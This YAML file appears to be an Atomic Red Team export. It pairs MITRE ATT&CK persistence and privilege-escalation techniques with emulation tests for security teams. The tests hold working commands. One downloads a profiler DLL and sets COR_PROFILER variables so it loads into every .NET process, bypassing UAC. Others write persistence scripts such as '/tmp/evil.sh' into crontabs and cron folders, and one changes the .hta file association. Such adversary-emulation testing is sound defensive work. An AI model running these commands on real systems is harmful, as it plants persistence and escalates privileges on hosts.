- - name: System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. - - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating system environment variables" -ForegroundColor Cyan - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path 
'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - cleanup_command: | - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null - Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null - name: powershell - elevation_required: true - - name: Registry-free process scope COR_PROFILER - auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - description: | - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. 
- - Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ - supported_platforms: - - windows - input_arguments: - file_name: - description: unamanged profiler DLL - type: Path - default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" - executor: - command: | - $env:COR_ENABLE_PROFILING = 1 - $env:COR_PROFILER = '#{clsid_guid}' - $env:COR_PROFILER_PATH = '#{file_name}' - POWERSHELL -c 'Start-Sleep 1' - cleanup_command: | - $env:COR_ENABLE_PROFILING = 0 - $env:COR_PROFILER = '' - $env:COR_PROFILER_PATH = '' - name: powershell - T1546.001: - technique: - created: '2020-01-24T13:40:47.282Z' - modified: '2020-01-24T13:40:47.282Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c - description: "Adversaries may establish persistence by executing malicious content - triggered by a file type association. When a file is opened, the default program - used to open the file (also called the file association or handler) is checked. - File association selections are stored in the Windows Registry and can be - edited by users, administrators, or programs that have Registry access (Citation: - Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or - by administrators using the built-in assoc utility. 
(Citation: Microsoft Assoc - Oct 2017) Applications can modify the file association for a given file extension - to call an arbitrary program when a file with the given extension is opened.\n\nSystem - file associations are listed under HKEY_CLASSES_ROOT\\.[extension], - for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler - for that extension located at HKEY_CLASSES_ROOT\\[handler]. The - various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. - For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* - HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe - values of the keys listed are commands that are executed when the handler - opens the file extension. Adversaries can modify these values to continually - execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)" - name: Change Default File Association - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1546.001 - url: https://attack.mitre.org/techniques/T1546/001 - - external_id: CAPEC-556 - source_name: capec - url: https://capec.mitre.org/data/definitions/556.html - - url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs - description: Microsoft. (n.d.). Change which programs Windows 7 uses by default. - Retrieved July 26, 2016. - source_name: Microsoft Change Default Programs - - url: http://msdn.microsoft.com/en-us/library/bb166549.aspx - description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. - Retrieved November 13, 2014. - source_name: Microsoft File Handlers - - url: https://docs.microsoft.com/windows-server/administration/windows-commands/assoc - description: Plett, C. et al.. (2017, October 15). assoc. 
Retrieved August - 7, 2018. - source_name: Microsoft Assoc Oct 2017 - - url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd - description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August - 8, 2018. - source_name: TrendMicro TROJ-FAKEAV OCT 2012 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. - - User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys. - - Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1546.001 - atomic_tests: - - name: Change Default File Association - auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 - description: "Change Default File Association From cmd.exe of hta to notepad.\n\nUpon - successful execution, cmd.exe will change the file association of .hta to - notepad.exe. 
\n" - supported_platforms: - - windows - input_arguments: - target_extension_handler: - description: txtfile maps to notepad.exe - type: Path - default: txtfile - extension_to_change: - description: File Extension To Hijack - type: String - default: ".hta" - original_extension_handler: - description: File Extension To Revert - type: String - default: htafile - executor: - command: 'assoc #{extension_to_change}=#{target_extension_handler} - -' - cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - -' - name: command_prompt - elevation_required: true - T1136.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1136.003 - url: https://attack.mitre.org/techniques/T1136/003 - - source_name: Microsoft O365 Admin Roles - url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide - description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. - al.. (2019, October 8). About admin roles. Retrieved October 18, 2019. - - source_name: Microsoft Support O365 Add Another Admin, October 2019 - url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d - description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. - - source_name: AWS Create IAM User - url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html - description: AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved - January 29, 2020. - - source_name: GCP Create Cloud Identity Users - url: https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 - description: Google. (n.d.). Create Cloud Identity user accounts. Retrieved - January 29, 2020. - - source_name: Microsoft Azure AD Users - url: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory - description: Microsoft. (2019, November 11). Add or delete users using Azure - Active Directory. 
Retrieved January 30, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Account - description: |- - Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) - - Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. - id: attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:44:27.995Z' - created: '2020-01-29T17:32:30.711Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Collect usage logs from cloud user and administrator accounts - to identify unusual activity in the creation of new accounts and assignment - of roles to those accounts. Monitor for accounts assigned to admin roles that - go over a certain threshold of known admins. 
- x_mitre_data_sources: - - Office 365 audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_contributors: - - Praetorian - - Microsoft Threat Intelligence Center (MSTIC) - x_mitre_platforms: - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - atomic_tests: [] - T1078.004: - technique: - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - name: Cloud Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078.004 - url: https://attack.mitre.org/techniques/T1078/004 - - source_name: AWS Identity Federation - url: https://aws.amazon.com/identity/federation/ - description: Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, - 2020. 
- - source_name: Google Federating GC - url: https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction - description: Google. (n.d.). Federating Google Cloud with Active Directory. - Retrieved March 13, 2020. - - source_name: Microsoft Deploying AD Federation - url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs - description: Microsoft. (n.d.). Deploying Active Directory Federation Services - in Azure. Retrieved March 13, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' - created: '2020-03-13T20:36:57.378Z' - x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - - Azure AD - - Office 365 - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs - x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal - or malicious behavior, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - atomic_tests: [] - T1542.002: - technique: - created: '2019-12-19T20:21:21.669Z' - modified: '2020-03-23T23:48:33.904Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4 - description: |- - Adversaries may modify component firmware to persist on systems. 
Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. - - Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. - name: Component Firmware - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1542.002 - url: https://attack.mitre.org/techniques/T1542/002 - - description: SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology - (S.M.A.R.T.). Retrieved October 2, 2018. - source_name: SanDisk SMART - - url: https://www.smartmontools.org/ - description: smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018. - source_name: SmartMontools - - url: https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html - description: Pinola, M. (2014, December 14). 3 tools to check your hard drive's - health and make sure it's not already dying on you. Retrieved October 2, - 2018. - source_name: ITWorld Hard Disk Health Dec 2014 - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Component firmware - - Process monitoring - - Disk forensics - - API monitoring - x_mitre_detection: |- - Data and telemetry from use of device drivers (i.e. 
processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. - - Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. - x_mitre_defense_bypassed: - - Anti-virus - - Host intrusion prevention systems - - File monitoring - x_mitre_permissions_required: - - SYSTEM - x_mitre_system_requirements: - - Ability to update component device firmware from the host operating system. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1546.015: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.015 - url: https://attack.mitre.org/techniques/T1546/015 - - url: https://msdn.microsoft.com/library/ms694363.aspx - description: Microsoft. (n.d.). The Component Object Model. Retrieved August - 18, 2016. - source_name: Microsoft Component Object Model - - url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence - description: 'G DATA. (2014, October). COM Object hijacking: the discreet - way of persistence. Retrieved August 13, 2016.' - source_name: GDATA COM Hijacking - - source_name: Endgame COM Hijacking - description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting - Persistence & Evasion with the COM. Retrieved September 15, 2016.' 
- url: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Component Object Model Hijacking - description: "Adversaries may establish persistence by executing malicious content - triggered by hijacked references to Component Object Model (COM) objects. - COM is a system within Windows to enable interaction between software components - through the operating system.(Citation: Microsoft Component Object Model) - \ References to various COM objects are stored in the Registry. \n\nAdversaries - can use the COM system to insert malicious code that can be executed in place - of legitimate software through hijacking the COM references and relationships - as a means for persistence. Hijacking a COM object requires a change in the - Registry to replace a reference to a legitimate system component which may - cause that component to not work when executed. When that system component - is executed through normal system operation the adversary's code will be executed - instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects - that are used frequently enough to maintain a consistent level of persistence, - but are unlikely to break noticeable functionality within the system as to - avoid system instability that could lead to detection. 
" - id: attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-07-09T13:55:51.172Z' - created: '2020-03-16T14:12:47.923Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: "There are opportunities to detect COM hijacking by searching - for Registry references that have been replaced and through Registry operations - (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary - paths with unknown paths or otherwise malicious content. Even though some - third-party applications define user COM objects, the presence of objects - within HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ may be anomalous and - should be investigated since user objects will be loaded prior to machine - objects in HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\.(Citation: Endgame - COM Hijacking) Registry entries for existing COM objects may change infrequently. - When an entry with a known good path and binary is replaced or changed to - an unusual value to point to an unknown binary in a new location, then it - may indicate suspicious behavior and should be investigated. \n\nLikewise, - if software DLL loads are collected and analyzed, any unusual DLL load that - can be correlated with a COM object Registry modification may indicate COM - hijacking has been performed. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_contributors: - - Elastic - x_mitre_platforms: - - Windows - atomic_tests: [] - T1554: - technique: - id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5 - description: |- - Adversaries may modify client software binaries to establish persistent access to systems. 
Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. - - Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host. - name: Compromise Client Software Binary - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1554 - url: https://attack.mitre.org/techniques/T1554 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-27T14:49:58.249Z' - created: '2020-02-11T18:18:34.279Z' - x_mitre_contributors: - - CrowdStrike Falcon OverWatch - x_mitre_data_sources: - - Process monitoring - - Binary file metadata - x_mitre_detection: "Collect and analyze signing certificate metadata and check - signature validity on software that executes within the environment. Look - for changes to client software that do not correlate with known software or - patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, - such as atypical module loads, file reads/writes, or network connections." 
- x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - atomic_tests: [] - T1136: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1136 - url: https://attack.mitre.org/techniques/T1136 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - description: |- - Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. - - Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection. - name: Create Account - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T12:44:28.199Z' - created: '2017-12-14T16:46:06.044Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Microsoft Threat Intelligence Center (MSTIC) - - Praetorian - x_mitre_version: '2.1' - x_mitre_data_sources: - - Office 365 account logs - - Azure activity logs - - AWS CloudTrail logs - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_detection: |- - Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. 
Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary. - - Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure AD - - Azure - - Office 365 - x_mitre_permissions_required: - - Administrator - atomic_tests: [] - T1543: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543 - url: https://attack.mitre.org/techniques/T1543 - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Create or Modify System Process - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. 
When operating systems - boot up, they can start processes that perform background system functions. - On Windows and Linux, these system processes are referred to as services. - (Citation: TechNet Services) On macOS, launchd processes known as [Launch - Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) - are run to finish system initialization and load user specific parameters.(Citation: - AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, - daemons, or agents that can be configured to execute at startup or a repeatable - interval in order to establish persistence. Similarly, adversaries may modify - existing services, daemons, or agents to achieve the same effect. \n\nServices, - daemons, or agents may be created with administrator privileges but executed - under root/SYSTEM privileges. Adversaries may leverage this functionality - to create or modify system processes in order to escalate privileges. (Citation: - OSX Malware Detection). " - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T13:46:29.922Z' - created: '2020-01-10T16:03:18.865Z' - x_mitre_data_sources: - - Windows event logs - - Windows Registry - - File monitoring - - Process command-line parameters - - Process monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitor for changes to system processes that do not correlate - with known software, patch cycles, etc., including by comparing results against - a trusted system baseline. New, benign system processes may be created during - installation of new software. 
Data and events should not be viewed in isolation, - but as part of a chain of behavior that could lead to other activities, such - as network connections made for Command and Control, learning details about - the environment through Discovery, and Lateral Movement. \n\nCommand-line - invocation of tools capable of modifying services may be unusual, depending - on how systems are typically used in a particular environment. Look for abnormal - process call trees from known services and for execution of other commands - that could relate to Discovery or other adversary techniques. \n\nMonitor - for changes to files associated with system-level processes." - x_mitre_platforms: - - Windows - - macOS - - Linux - atomic_tests: [] - T1053.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.003 - url: https://attack.mitre.org/techniques/T1053/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cron - description: |- - Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. - - An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. cron can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. 
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T23:30:46.546Z' - created: '2019-12-03T14:25:00.538Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement. " - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1053.003 - atomic_tests: - - name: Cron - Replace crontab with referenced file - auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - description: 'This test replaces the current user''s crontab file with the contents - of the referenced file. This technique was used by numerous IoT automated - exploitation attacks. 
- -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: "/tmp/evil.sh" - tmp_cron: - description: Temporary reference file to hold evil cron schedule - type: path - default: "/tmp/persistevil" - executor: - name: bash - command: | - crontab -l > /tmp/notevil - echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - cleanup_command: 'crontab /tmp/notevil - -' - - name: Cron - Add script to all cron subfolders - auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, - /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a - schedule. This technique was used by the threat actor Rocke during the exploitation - of Linux web servers. - -' - supported_platforms: - - macos - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in cron folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: | - echo "#{command}" > /etc/cron.daily/#{cron_script_name} - echo "#{command}" > /etc/cron.hourly/#{cron_script_name} - echo "#{command}" > /etc/cron.monthly/#{cron_script_name} - echo "#{command}" > /etc/cron.weekly/#{cron_script_name} - cleanup_command: | - rm /etc/cron.daily/#{cron_script_name} - rm /etc/cron.hourly/#{cron_script_name} - rm /etc/cron.monthly/#{cron_script_name} - rm /etc/cron.weekly/#{cron_script_name} - - name: Cron - Add script to /var/spool/cron/crontabs/ folder - auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - description: 'This test adds a script to a /var/spool/cron/crontabs folder configured - to execute on a schedule. This technique was used by the threat actor Rocke - during the exploitation of Linux web servers. 
- -' - supported_platforms: - - linux - input_arguments: - command: - description: Command to execute - type: string - default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log - cron_script_name: - description: Name of file to store in /var/spool/cron/crontabs folder - type: string - default: persistevil - executor: - elevation_required: true - name: bash - command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - -' - cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - -' - T1574.001: - technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern - id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 - description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - - There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. 
